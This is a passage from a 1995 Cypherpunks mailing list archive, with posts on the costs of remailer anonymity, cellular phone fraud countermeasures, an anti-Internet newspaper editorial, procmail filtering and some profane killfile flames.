On Sat, 7 Jan 1995, "L. Todd Masco" wrote:

> Like "Seventeen," "Wired" should prepend "don't you wish you were" to
> its title.
Ah, yes, I wish I were "(c) Both of the above" -- as the Sinatra lyric sez, "When I was seventeen, it was a very WiReD year..."

I think generalizing about "Wired" is like generalizing about the NY Times, where Markoff and Lewis arguably exemplify the best and worst of mainstream computer/telecom journalism. "Wired" has many flaws, but I consider Steven Levy's articles about Cypherpunks, Whitfield Diffie, and digital cash to be among the best expositions of Cypherpunk issues for the layperson. (Kelly's "Whole Earth Review" piece is another.) I can forgive some faults in return for seeing Levy's non-technical explanations of public-key crypto and the Dining Cryptographers protocol in successive issues. :-)

Alan Westrope
__________/|-,
   (_)    \|-'        2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
-----END PGP SIGNATURE-----

From adam at bwh.harvard.edu Sat Jan 7 10:08:06 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sat, 7 Jan 95 10:08:06 PST
Subject: A Fire Upon the Deep
In-Reply-To:
Message-ID: <199501071808.NAA09510@bwh.harvard.edu>

Anonymous mail has bandwidth costs that are only slightly higher than regular mail. You could hide quite a bit in most video packets. The latency is a reflection of the lack of volume, because volume is needed for reordering. If your favorite remailer gets more mail, the latency will drop.

Also, on the book trend, Neal Stephenson's new book, The Diamond Age (Bantam Spectra, 1995) has a brilliant hacker dump information he comes across because it's encrypted, and he knows he'll never manage to break the encryption scheme. I haven't finished it, but it's quite good about 1/3 of the way through.
Adam

Wei Dai wrote:

| One more thing that's marginally related to cypherpunks (hey I really
| like this book so I'll take any chance I can to talk about it ;-) is
| the idea that the efficiency of distributed computation (and distributed
| intelligence) depends on high bandwidth and low latency of the communication
| medium. Since anonymity seems to have rather high costs in terms of
| bandwidth and latency (compare anonymous e-mail with internet video
| conferencing or even with normal e-mail), this implies that
| an organization of anonymous agents will not work as efficiently as
| a similar organization whose members are not concerned about
| anonymity.

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From adam at bwh.harvard.edu Sat Jan 7 10:19:54 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Sat, 7 Jan 95 10:19:54 PST
Subject: procmail
In-Reply-To:
Message-ID: <199501071818.NAA09659@bwh.harvard.edu>

ftp.informatik.rwth-aachen.de:/pub/packages/procmail

I find I need the following rule to get everything sent to cypherpunks:

    # Match list mail by destination header, Sender header, or mbox "From " line
    :0
    * (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks@toad.com)

From weidai at eskimo.com Sat Jan 7 10:47:56 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sat, 7 Jan 95 10:47:56 PST
Subject: A Fire Upon the Deep
In-Reply-To: <199501071808.NAA09510@bwh.harvard.edu>
Message-ID:

On Sat, 7 Jan 1995, Adam Shostack wrote:

> Anonymous mail has bandwidth costs that are only slightly
> higher than regular mail. You could hide quite a bit in most video
> packets. The latency is a reflection of the lack of volume, because
> volume is needed for reordering. If your favorite remailer gets more
> mail, the latency will drop.

Anonymous e-mail that goes through a chain of N remailers will cost at least N times as much bandwidth and have N times as much latency as normal e-mail.
But e-mail is hardly the state-of-the-art of network communication, while anonymous e-mail IS the state of the art for anonymous communication. How long will it take for the technology of anonymous video conferencing to develop, for example? By then, of course, those who are not concerned with anonymity will probably have things such as full sensory virtual interaction.

Note that I SUPPORT anonymous communication, but its costs of bandwidth and latency may be a real obstacle to developing Cryptoanarchy (of the kind described by Tim May) if most people are not willing to put up with those costs.

Wei Dai

PGP encrypted mail welcome.

From an172607 at anon.penet.fi Sat Jan 7 10:55:27 1995
From: an172607 at anon.penet.fi (duquesne duke)
Date: Sat, 7 Jan 95 10:55:27 PST
Subject: cel fraud
Message-ID: <9501071759.AA00953@anon.penet.fi>

Fighting Cellular Fraud, New York To Washington

BEDMINSTER, NEW JERSEY, U.S.A., 1995 JAN 6 (NB) -- Bell Atlantic Mobile (BAM, parent NYSE:BEL) and NYNEX Mobile Communications (parent NYSE:NYN), two large US cellular phone carriers, are about to block automatic "roaming" service in New York City and surrounding areas.

Starting January 9, BAM customers who place calls in the city will need to enter a personal identification number (PIN) issued by BAM in order to complete the call.

The new policy is an antifraud measure to combat criminals who steal cellular service, BAM said. The PIN system was developed by NYNEX and is in use inside the City now, NYNEX sources said.

Both firms emphasized that the new policy is no magic wand to do away with cellular fraud. However, as a BAM spokesperson told Newsbytes, the combination of restricted roaming and PIN numbers will "raise the bar again" where cellular fraud is concerned.
Under the new system, the two cellular carriers will restrict calls in the greater NYC area by roaming customers from a "Fraud Protection Zone" that includes Washington, D.C.; Baltimore; Pittsburgh; and greater Philadelphia, including Delaware and southern New Jersey. BAM adopted the new measures because of increasing problems with cloning, in which a criminal picks off a cellular customer's automated phone IDs during a legitimate call and uses them to make a "clone phone." The cloned phone can be used to make calls for which the legitimate customers, not the cloners, are billed. AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations have become such a successful criminal industry that some criminals sell the phones with 30-day guarantees. "If a number is cut off, you can bring it back to the cellular bandits and have it reprogrammed for no additional charge," he explained. "It costs the carriers around $1 million a day." He paused, then added: "It just shows how big a demand there is for wireless communications." Under the new policy, customers from inside the protected zone who want to use their phones at standard "roaming" rates in New York City must first contact BAM by dialing 211 from their cellular phone. After they provide proper identification and select a PIN code, the company deactivates the fraud zone lock-out. NYNEX spokesperson Kim Ancin told Newsbytes that customers with PIN numbers place calls as much usual by dialing the destination number and pressing the Send button. However, on protected phones, the customer then punches in the PIN number and presses Send again. Ancin explained that the PIN number goes out on a frequency different from the initial send. Cellular bandits use special equipment to pick up a legitimate phone's mobile identification number (MIN) and electronic serial number (ESN), which until now have been enough to clone a phone. 
However, she said, adding a PIN number on a second frequency makes cloning much more difficult. BAM said it would not activate the fraud protection lock-out in northern New Jersey, where calls to New York City are local calls. However, since customers who travel frequently into the city are at risk from cloning, the firm strongly recommended that northern New Jersey customers sign up for a PIN. Eventually, the firm said, all new customers will be required to select PINs. BAM said if a bandit does succeed in cloning a PIN-equipped phone, a customer can simply change the PIN number. Customers without PIN numbers must bring their phones back to a carrier or dealer to install a new phone number, notify business associates and friends of the number change, and modify business cards and stationery. There is no extra charge for PIN numbers, which are implemented by software at the carrier's switch, BAM's Fleischer told Newsbytes. The feature will not affect commonly used cellular services like voice mail or call waiting. Calls to 911, 611 and 411 will not require a PIN. (Craig Menefee/19950106/Press Contact: Steve Fleischer, 908-306-7539 or Brian Wood, 908-306-7508, both of BAM; Kim Ancin, 914-365-7573, or Jim Gerace, 914- 365-7712, both of NYNEX) ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From peb at netcom.com Sat Jan 7 11:19:20 1995 From: peb at netcom.com (Paul E. Baclace) Date: Sat, 7 Jan 95 11:19:20 PST Subject: TEMPEST Questions... Message-ID: <199501071919.LAA22533@netcom19.netcom.com> Grady Ward wrote an article on implementing something like TEMPEST ("something like" means that it was not derived from classified documents). 
I can't seem to find my copy of his text and it doesn't appear anymore at netcom:/ftp/pub/gr/grady... Anyone have a pointer to this? This article is definitely the most practical and comprehensive that I've seen on this subject.

Paul E. Baclace
peb at netcom.com
peb at eng.sun.com

From doumakes at netcom.com Sat Jan 7 11:27:20 1995
From: doumakes at netcom.com (Don Doumakes)
Date: Sat, 7 Jan 95 11:27:20 PST
Subject: Let's NOT talk about Netcom
Message-ID: <199501071927.LAA09582@netcom20.netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

If I wanted to read flamage about Netcom, I'd check out netcom.general, which is 150 messages a day of, mostly, garbage. I earnestly request that we not duplicate that clutter on the cpunks list.

- --
______________________________________________________________________
Don Doumakes    Finger doumakes at netcom.com for PGP public key
Foxpro databases built to your specifications. Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From tcmay at netcom.com Sat Jan 7 11:50:42 1995
From: tcmay at netcom.com (Timothy C. May)
Date: Sat, 7 Jan 95 11:50:42 PST
Subject: Latency Costs of Anonymity
In-Reply-To:
Message-ID: <199501071950.LAA22106@netcom17.netcom.com>

[thread name changed to reflect actual topic]

Wei Dai wrote:

> Note that I SUPPORT anonymous communication, but its costs of bandwidth
> and latency may be a real obstacle to developing Cryptoanarchy (of the
> kind described by Tim May) if most people are not willing to put up with
> those costs.
>

The good news is that many of the messages that people want anonymity for are *text* files, e.g., offers of services, controversial data or opinions, etc.

There's a kind of tradeoff in size and urgency.
To wit, it is seldom "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I can't draw my favorite little diagram here showing the space of messages, with "urgency" and "size" as the axes.)

However, I will try such a diagram here:

        ^
        ^
        |
        |short         <---there are very few large files
URGENCY |messages          that must be urgently transmitted
        |
        |
        |
        |                    non-urgent
        |                    huge files
        ---------------------->
         text     books    videos
         10K      1 MB     1GB

              S I Z E --->

(The tradeoffs are of viewing time, caching, information, etc. A short message can be _read_ quickly, and hence may need to be transmitted quickly. The canonical "Attack at dawn" message, for example. A long message, such as my 1.3 MB FAQ, clearly can be delayed for hours or days with no real loss, save impatience. My contention is that network speeds--ISDN, Mosaic usage, faster modems, direct connections--are being set up and that "urgent-but-small" messages will fit in nicely, and with low latency through remailers. In the next several years, that is.)

What this means is that networks of the future, set up to handle huge files, video-on-demand, etc., will allow text messages to be carried almost unnoticeably. Interstitially, if you will.

Reordering still requires N messages (whatever N may be), so it is true that remailer sites must still have some traffic. But this doesn't have to introduce latencies that are unacceptable.

(If this isn't clear, what I mean by the situation about large files being shipped is that there should be little cost for users circulating their own dummy messages through remailer chains. Digital postage will cost, but costs will drop. Lots of tradeoffs here. No point in me or any of us trying to anticipate costs, volumes, etc., as these will evolve and the market will decide.)

--Tim May

--
..........................................................................
Timothy C.
May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From roy at cybrspc.mn.org Sat Jan 7 11:54:26 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Sat, 7 Jan 95 11:54:26 PST Subject: cel fraud In-Reply-To: <9501071759.AA00953@anon.penet.fi> Message-ID: <950107.134210.3m7.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, an172607 at anon.penet.fi writes: > AT&T's Steve Fleischer, speaking to Newsbytes, said such cloning operations > have become such a successful criminal industry that some criminals sell the > phones with 30-day guarantees. > > "If a number is cut off, you can bring it back to the cellular bandits and > have it reprogrammed for no additional charge," he explained. "It costs the > carriers around $1 million a day." > > He paused, then added: "It just shows how big a demand there is for wireless > communications." Does anyone else think this is funny (in both senses of the word)? The cell-phraud system shows a demand for cheap, though illegal, phone service. The wireless aspect is pretty much incidental to the fraud aspect, no? - -- Roy M. 
Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 -----END PGP SIGNATURE----- From cjl at welchlink.welch.jhu.edu Sat Jan 7 12:18:49 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Sat, 7 Jan 95 12:18:49 PST Subject: pgp shells for windows.... In-Reply-To: Message-ID: On Sat, 7 Jan 1995, Oren Tanay wrote: [PGP Windoze front-end request. . .] In response to a similar question a wiser head than mine suggested looking in ftp to unix.hensa.ac.uk/pub/uunet/pub/security/virus/crypt/pgp/shells C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From weidai at eskimo.com Sat Jan 7 12:51:25 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 12:51:25 PST Subject: Latency Costs of Anonymity In-Reply-To: <199501071950.LAA22106@netcom17.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > The good news is that many of the messages that people want > anonymity for are *text* files, e.g., offers of services, > controversial data or opinions, etc. > > There's a kind of tradeoff in size and urgency. To wit, it is seldom > "urgent" that a 1 MB or 100 MB or whatever file get through. (Sorry I > can't draw my favorite little diagram here showing the space of > messages, with "urgency" and "size" as the axes.) The points Tim makes here are quite good. However, I'm more concerned with a slightly longer time scale, when people focus less on FILES, but more on CONVERSATIONS and INTERACTIONS. It is then that latency becomes more problematic.
Can anyone give me an estimate of when truly anonymous video conferencing will become possible? This is not just to help me make the point, but I'm really wondering. Wei Dai From mikepb at freke.lerctr.org Sat Jan 7 14:09:35 1995 From: mikepb at freke.lerctr.org (Michael P. Brininstool) Date: Sat, 7 Jan 95 14:09:35 PST Subject: SAN FRANCISCO EDITORIAL In-Reply-To: Message-ID: <1995Jan7.134217.22470@freke.lerctr.org> -----BEGIN PGP SIGNED MESSAGE----- In article sandfort at crl.com (Sandy Sandfort) writes: >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > >C'punks, > >Here is a guest editorial that ran in Monday's SF Chronicle. It >should make your blood boil. Is anyone going to write rebuttals? Would the SF Chronicle print them? As I read this, I only saw the following propaganda: > ANARCHY, CHAOS ON THE INTERNET MUST END in Cyberspace, there is not much order. It is governed by no one. ... being left to the equivalent of mob rule. the need for firm direction is all too obvious. ... unregulated broadcasting ..., sexual harassment, profanity, defamation, forgery and fraud ... secretiveness is why abuse is easy. problems are further exacerbated by Anonymous Server, which launders computer messages, like money is laundered. ... difficulties in commercialization. turf war rages between factions ... attacks on business people ... vandalism, persist uncontrolled. Worst of all are the ``canceller robots,'' ... the communications the hackers wish to silence. vigilantes routinely challenge free speech unabated ... access providers, assume the role of censors, arbitrarily closing accounts of those whom they disapprove. one obvious way to bring much needed order, is through diplomacy. The United States should lead in this. ... urge the Finnish government to deactivate the Anonymous Server. establish a standard of recognizing laws existing at the point of origin as controlling the message sender. 
When conflicts arise, governmental diplomacy should again be the answer, just as it is with other trade and communications issues. Next, laws already regulating behavior in the real world should be applied in Cyberspace. The Supreme Court should act ... stating that crime is crime, even when the criminal instrument is a computer keyboard. legislation should be passed making access providers common carriers. This will get them and under the guiding hand of the FCC ... People need safety and order in Cyberspace just as they do in their homes and on the streets. The current state makes it clear that anarchy isn't working. If governments don't bring order, chaos may soon dictate.

!@&^%&^!%@&$^%&^@%$&^!@$

I wish I could write worth beans. I have never been published in any newspaper, anywhere. They never like my rebuttals. I guess I get too rabid when I write.

- ---------------------------------------------------------|
| #include "std/disclaimer.h"     Michael P. Brininstool  |
| mikepb at freke.lerctr.org  OR  mikepb at netcom.com     |
|---------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.9 alpha I - BACK UP YOUR KEYRING BEFORE USE
-----END PGP SIGNATURE-----

From nesta at nesta.pr.mcs.net Sat Jan 7 14:57:34 1995
From: nesta at nesta.pr.mcs.net (Nesta Stubbs)
Date: Sat, 7 Jan 95 14:57:34 PST
Subject: Killfiles 101
In-Reply-To:
Message-ID:

On Sat, 7 Jan 1995, Carol Anne Braddock wrote:

all responses and replies and nonsensical remarks to this post can be taken off the cypherpunks list and directed to me carol, or whomever decides to respond, unless of course something productive pops out of it.

>
> 1. The best and only way you can be sure you're
> killing a file is to turn your machine off.
> Only then can you be sure it is dead. > wow, she knows about puns, cool. > 2. If you must resort to using killfiles, > (great marketer trick, make you use it > again and again, and again, like a gun) > kill "classes" of files, as opposed to > individuals, you'll get better kill ratio. > A good example is anon or wizvax users. > class of users are to vague and I fear I may kill something I want to read. I have never came toa a point where i knew all posts from such and site site or class of users was not worth my time, but I have run across dozens of individuals who I realized said nothing I wanted to waste a "d" or "n" keystroke on. > 3. Note: Killfiles are a censor's best friend! > And you'll become what you swore you wouldn't. > Bullshit, you sound like Doctress fuckin Nuetopia. Kill files are not censorship at all, do you pay attention to everythign that coems your way? Do you read every last scrap of paper people put in front of you? Do you go out and buy every fuckin perdiodical just in case there is an article in them you want, or are you intelligent enough to make judgemnets to conserve your time and sanity by not wasting your time on information resources you know will bring nothing too you. If I really wanted to censr or kill you Carol, and not simply avoid having to "d" thru a good thrity messages I don't want to read, you wouldn't be replying to this at all dear. > does your signature tell the truth nesta? Can't know everything > with a killfile! Eventually you'll kill the file that'd get you sex. So far your posts have told me nothing I didnt already know. Damn Carol, I was on your side until you started to REALLY SPAM. i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From tcmay at netcom.com Sat Jan 7 14:58:36 1995 From: tcmay at netcom.com (Timothy C. 
May) Date: Sat, 7 Jan 95 14:58:36 PST Subject: Latency Costs of Anonymity In-Reply-To: Message-ID: <199501072258.OAA28744@netcom4.netcom.com> Wei Dai wrote: > The points Tim makes here are quite good. However, I'm more concerned > with a slightly longer time scale, when people focus less on FILES, > but more on CONVERSATIONS and INTERACTIONS. It is then that latency > becomes more problematic. > > Can anyone give me an estimate of when truly anonymous video conferencing > will become possible? This is not just to help me make the point, but > I'm really wondering. I didn't know you meant real-time conversations and interactions. These are indeed very hard to get acceptable latency on in mixes. Defeating traffic analysis in such a case is highly problematic, at least with conventional remailers. (Unconventional remailers, such as a dedicated telephone "traffic scrambler," with lots of internal bandwith between nodes, could work. Obviously a lot of other traffic would have to be flowing in and out.) The tradeoffs are best analyzed with an actual mathematical model of nodes, traffic rates, clumping of traffic, etc., rather than our hand-waving here (hand-waving is OK for broad conceptual points, but not in cases like this). I'll be interested in what others calculate, but I think "conversation mixes" are several years off, at best. The upcoming demo of Voice PGP by Phil Zimmermann (scheduled to appear at the Demo Day meeting next Saturday) may be a step in this direction. BTW, to my graph in my last post we could add a z-axis representing "value." Roughly, how much per unit of data transmitted. The crypto-canonical "Attack at dawn" message might easily be worth many dollars per byte to transmit untraceably, whereas a casual phone conversation between Alice and Bob may not be worth (to them, separately or in combination) much more than a few cents per kilobyte transmitted. 
In other words, there are economic as well as technologic reasons I doubt we'll see low-latency, high-bandwidth audio or video remailers anytime soon. (As we're seeing now: short messages can get through in tens of seconds, But like I said, some calculations are called for. I'd start by analyzing the existing voice-over-Internet systems, the packet sizes, and so forth. My suspicion is that Alice and Bob cannot defeat traffic analysis while ~10K bits per second are flowing continuously between them (audio), at least not until _many_ subnetworks are _much_ faster. Also, the CPU loads would be great (= costly)). Video is even further off. Tricks to reduce bandwidth may help. The digital mixes implicitly assumed in "True Names"--the year before Chaum published his seminal mix paper--are a ways off. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From hfinney at shell.portal.com Sat Jan 7 14:59:27 1995 From: hfinney at shell.portal.com (Hal) Date: Sat, 7 Jan 95 14:59:27 PST Subject: Latency Costs of Anonymity Message-ID: <199501072300.PAA25794@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- From: Wei Dai > The points Tim makes here are quite good. However, I'm more concerned > with a slightly longer time scale, when people focus less on FILES, > but more on CONVERSATIONS and INTERACTIONS. It is then that latency > becomes more problematic. I think this is a good point. We have had some discussions about getting anonymity with web browsing. 
The "mix" or "remailer" concept doesn't work so well there as the connections are very short, so there is less chance of multiple communications going on at one time. OTOH I have heard discussions of asynchronous transfer mode, ATM, as a new packet-based network technology that could support high bandwidth communications. All messages, presumably even streams like video signals, get broken into fixed-size packets, which make their way through the network and are reassembled into a stream on the other end. The individual packets may not all take the same path through the network. (I am far from an expert on ATM so I welcome corrections to this description.) This technology does sound like mixing could work pretty well to provide anonymity. There is some price in bandwidth and latency but ATM is so fast that probably several steps of chaining and mixing would be possible. Naturally such mixes would have to be hardware based due to the rapid speeds of the packets. So this would be kind of a "souped up" version of our current email remailer network, with vastly greater bandwidths and switching speeds. Another possibility with connection-based communications would be Chaum's DC-Nets. These are networks where message source cannot be determined. They do face potentially severe costs in terms of bandwidth, though, depending on how much anonymity you get. As both mixes and dcnets have bandwidth costs, I wonder if it is provable that anonymity implies such costs. > Can anyone give me an estimate of when truly anonymous video conferencing > will become possible? This is not just to help me make the point, but > I'm really wondering. > > Wei Dai I think it may be more useful rather than speaking of "true" anonymity to think of factor-of-N anonymity. This reflects the bandwidth costs. I would guess that, if you have a packet-based video converencing system, that today you could probably get factor-of-2 anonymity with custom hardware, and perhaps even more than that. 
One other point I would make, based on Wei's original post, is that no doubt anonymity does exact some costs. However this does not mean that it is uncompetitive. It also may have, in some circumstances, advantages. People may be more frank and critical when they are shielded by anonymity. I've read articles about companies which introduce electronic "suggestion boxes" where people can post anonymously, and upper management is often shocked at the results. It is too early to judge how much of a net benefit or harm anonymity will be in general. Furthermore, it is likely that the net advantage will differ depending on the business or organization. At one extreme, a group working with illegal or restricted technology would probably benefit more from anonymity. I think it was Keith Henson who posted a story here a couple of years ago that he was working on, involving some kind of underground protest group which organized itself using crypto anonymity. So it is really not a question of whether anonymity is good or bad, but rather whether its costs outweigh its advantages in a particular situation. Hal Finney hfinney at shell.portal.com From jsled at free.org Sat Jan 7 14:59:43 1995 From: jsled at free.org (Josh Michael Sled) Date: Sat, 7 Jan 95 14:59:43 PST Subject: Chinese EBS Message-ID: <199501072319.RAA03833@squeaky.free.org> -----BEGIN PGP SIGNED MESSAGE----- I've been reading through "Applied Cryptography," as every good boy and girl should :) and one of the concepts struck out at me recently. The idea of the Chinese Lottery seemed to be rather far fetched in my first few readings, but then I came across the discussion of the new Emergency Broadcast System.
This may just be an unfair helping of paranoia, but the system seems to be a perfect distribution system for a Chinese Lottery-like keychecking or cracking system. Even though the public can turn off the broadcast, the signal will still be sent. The chips may even be government-regulated... available only from the government so no one can tamper with the signal and use this system for their own information-dissemination needs (*ahem* Political agendas *ahem* re-election ads). They might even encrypt the signals, for a touch of irony. Anyone find fault in this? - -Joshua M. Sled --- KWQ/2 1.2g NR "MTV get off the air!" - DKs From tcmay at netcom.com Sat Jan 7 15:38:25 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 15:38:25 PST Subject: Don't Say Anything More in Public! In-Reply-To: <199501072319.RAA03833@squeaky.free.org> Message-ID: <199501072338.PAA04770@netcom4.netcom.com> Josh Michael Sled wrote: ... > The idea of the Chinese Lottery seemed to be rather far fetched in my > first few readings, but then I came across the discussion of the new > Emergency Broadcast System. > > This may just be an unfair helping of paranoia, but the system seems > to be a perfect distribution system for a Chinese Lottery-like > keychecking or cracking system. Even though the public can turn off the > broadcast, the signal will still be sent. The chips may even be > government-regulated... available only from the government so no one can > tamper with the signal and use this system for their own > information-dissemination needs (*ahem* Political agendas *ahem* > re-election ads). They might even encrypt the signals, for a touch of > irony. Anyone find fault in this?
Josh, I'm sending this note to you privately--please don't comment anymore in public on this! You could be undermining national insecurity by revealing this system! More than just key-crackers are included in the Emergency Broadcast System boxes. In addition, the red LED acts just as the LEDs on cable set-top boxes act, namely, as an infrared sensor. These LEDs can count the numbers of citizen-units in the same room as the unit, and can of course even detect the thermal signature of drug abuser (flushed skin, dilated eyes, etc.). The key-cracking functions are only incidental. In fact, they may not even be cost-effective. I was told last year by the NSA's A.U.N.T.I.E. (Authorization Unit for Non-Terminal Industrial Enterprises) group that the real key-cracking crunch is contained in the *Clipper* phones, which of course have crypto modules and can do all the right calculations. They can also occasionally dial the Clipper phone ("Sorry, wrong number.") and check on the progress of calculations. Mysterious phone calls in the middle of the night should rightly worry folks--it may mean your number's up. But don't discuss this on the list! If you do, she'll have us killed. (And don't call her Dotty!) --Klaus! von Future Prime, being channelled by Carol Moore^H^H^H^H^HAnne Braddock From greg at ideath.goldenbear.com Sat Jan 7 15:45:24 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sat, 7 Jan 95 15:45:24 PST Subject: Anonymity and cost Message-ID: <199501072330.AA30350@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Wei Dai writes: > Anonymous e-mail that goes through a chain of N remailers will cost at > least N times as much bandwidth and have N times as much latency as normal > e-mail. But e-mail is hardly the state-of-the-art of network > communication, while anonymous e-mail IS the state of the art for > anonymous communication. How long will it take for the technology of > anonymous video conferencing to develope, for example? 
By then, of > course, those who are not concerned with anonymity will probably have > things such as full sensory virtual interaction. At a very basic level, anonymous (not pseudonymous, like the remailers are) messages are *cheaper*, because they carry less information; they do not need to send the bits which identify the sender. This conversation seems to elide distinctions between low-level anonymity (where source information is simply not transmitted) and high-level anonymity, where source information is transmitted but is not used for social or political reasons. Anonymous remailers are considered "anonymous" because (some of us) agree that we won't treat the "From:" line as indicating the real author of the text below. We agree this because we know how remailers work; we know that (probably) the person who wrote the message isn't the same person as the owner of the "From:" address. When we say a message is "anonymous" we mean that its real author should not/cannot be connected with the text of the message. We could just as easily agree on an "Identify-Author:" header field by which authors could indicate whether or not they wished to be speaking "on the record" when they wrote the message. A multi-hop message where the "From:" line changes with each hop costs almost precisely what a multi-hop message would cost without the "From:" line changes. Folks feeling detail-oriented can calculate the cost of the CPU time to strip header information vs. the cost of sending that header information to the next hop. I don't care about the answer, so I'm not going to. Anonymous video conferencing is available now; go to Kinko's, pay cash for the use of their video conference room. Or, ask/convince the recipient to consider the conversation "off the record". 
Current remailer operators experience a cost in that they receive some amount of hassle and exposure to liability by running remailers; but this is merely a "cost" shifted from one person (the author) to another, the surrogate author. This may look like a cost of anonymity but it's more accurately described as the cost of being provocative or rude or illegal. From nesta at nesta.pr.mcs.net Sat Jan 7 15:53:56 1995 From: nesta at nesta.pr.mcs.net (Nesta Stubbs) Date: Sat, 7 Jan 95 15:53:56 PST Subject: The first reply came 3 days later. In-Reply-To: Message-ID: From my present calculations approximately 14 percent of my mail for the last two days has been from Carol Ann, this is not a small feat considering the amount of mailing I usually receive. Perhaps if Carol would post a well thought out and written article on what happened, instead of posting a thousand little "me toos" and "told ya so's" and such, this wouldn't be so annoying. Rough estimate of mine is that she is responsible for 30 some percent of the traffic on cypherpunks at this time. Worse part is that because I receive my mail thru a SLIP link which is admittedly slow, I still have to receive all noise messages thru my SLIP link before procmail can trash/delete/redirect them. So now taking this into consideration, it seems that Carol Ann is responsible for more thruput on my SLIP link than myself, since mostly I receive mail thru it. It's a close call, me or Carol, that's counting in FTPs and WWW browsing.
I mean maybe I should charge her money now 8) i want to know everything http://www.mcs.com/~nesta/home.html i want to be everywhere Nesta's Home Page i want to fuck everyone in the world & i want to do something that matters /-/ a s t e zine From tcmay at netcom.com Sat Jan 7 16:18:40 1995 From: tcmay at netcom.com (Timothy C. May) Date: Sat, 7 Jan 95 16:18:40 PST Subject: Anonymity and cost In-Reply-To: <199501072330.AA30350@ideath.goldenbear.com> Message-ID: <199501080018.QAA11241@netcom4.netcom.com> Greg Broiles wrote: > At a very basic level, anonymous (not pseudonymous, like the remailers > are) messages are *cheaper*, because they carry less information; they > do not need to send the bits which identify the sender. I think the meaning of "anonymous" here is clearly with respect to _traffic analysis_. The "cost of anonymity" is with respect to the costs and delays of using digital mixes (remailers). The relatively few bytes of header information don't affect the cost in any substantive way. > This conversation seems to elide distinctions between low-level > anonymity (where source information is simply not transmitted) and > high-level anonymity, where source information is transmitted but is > not used for social or political reasons. Again, traffic analysis is the issue. (And I don't necessarily mean NSA-type traffic analysis...Net-savvy investigators can trace messages back to origins even when a message is ostensibly anonymous. So far as I know, some form of mix/remailer is needed to ensure anonymity.) > A multi-hop message where the "From:" line changes with each hop > costs almost precisely what a multi-hop message would cost without > the "From:" line changes. Folks feeling detail-oriented can calculate > the cost of the CPU time to strip header information vs. the cost of > sending that header information to the next hop. I don't care about > the answer, so I'm not going to. ??? This is not the "cost" that is being discussed.
Stripping or changing headers is a trivial cost compared to the latency delays that may result when mix reordering is done (how much latency is involved is a function of several things, including reordering desired ("N"), amount of other traffic). > Anonymous video conferencing is available now; go to Kinko's, pay > cash for the use of their video conference room. Or, ask/convince > the recipient to consider the conversation "off the record". Neither of these kinds of "anonymity" are cryptographically interesting, or strong. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From weidai at eskimo.com Sat Jan 7 16:37:54 1995 From: weidai at eskimo.com (Wei Dai) Date: Sat, 7 Jan 95 16:37:54 PST Subject: Latency, bandwidth, and anonymity In-Reply-To: <199501072258.OAA28744@netcom4.netcom.com> Message-ID: On Sat, 7 Jan 1995, Timothy C. May wrote: > The tradeoffs are best analyzed with an actual mathematical model of > nodes, traffic rates, clumping of traffic, etc., rather than our > hand-waving here (hand-waving is OK for broad conceptual points, but > not in cases like this). Are there any theoritical tools developed especially for this type of analysis? If so, can anyone provide some references? > I'll be interested in what others calculate, but I think "conversation > mixes" are several years off, at best. The upcoming demo of Voice PGP > by Phil Zimmermann (scheduled to appear at the Demo Day meeting next > Saturday) may be a 